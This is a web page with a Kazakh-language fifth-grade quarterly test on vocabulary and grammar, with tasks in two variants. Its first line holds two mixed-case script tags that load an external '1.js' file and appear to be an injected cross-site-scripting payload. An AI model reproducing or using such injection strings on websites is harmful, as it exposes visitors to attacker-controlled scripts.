<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.01.2017

Қазақ тілі пәнінен 5- сыныпқа арналған I-тоқсандық бақылау жұмысы

Мақсаты:Тоқсан бойы лексика және грамматика тақырыптар бойынша алған білімдерін тексеру.

I.Лексикалық тапсырмалар

1.Тақырып бойынша мақал-мәтелдер жазу.

I нұсқа: «Отбасы»

II нұсқа: «Дос,достық»

2.Берілген тақырып бойынша 3-4 сөйлем құрастыру.

I нұсқа: «Менің мекенжайым»

II нұсқа: «Менің бөлмем»

3.Берілген сөз тіркестерін қазақ тіліне аудару.

I нұсқа: Светлая комната,мой адрес;

II нұсқа: Мой друг,широкая улица;

4.Сөздердің антонимін тауып жазу.

I нұсқа: Қара,тар;

II нұсқа: Кіші,аласа;

5.Берілген сұрақтарға жауап беру.

I нұсқа: Сен қай қалада тұрасың?Сенің қалаң қандай?

II нұсқа: Сен қай көшеде тұрасың?Көшең қандай?

II.Грамматикалық тапсырмалар

1.Берілген сөздерге фонетикалық талдау жаса.

I нұсқа: әпкем

II нұсқа: досым

2.Берілген сөзді жекеше түрінде жіктеңіз.

I нұсқа: ата

II нұсқа: әже

3.Берілген сөздерді барыс,табыс,көмектес септіктеріне қою.

I нұсқа: көше,аға;

II нұсқа: қала,сіңлі;

4.Берілген сан есімдерді реттік сан есімдерге айналдыру.

I нұсқа: бес,тоғыз;

II нұсқа: алты,жеті;

5.Берілген етістікті нақ осы шақта жіктеңіз.  Iнұсқа: жазу ;  II нұсқа: келу.

 

Просмотров: 646


Пікір қосу



Деректерді қолтаңбаға қосу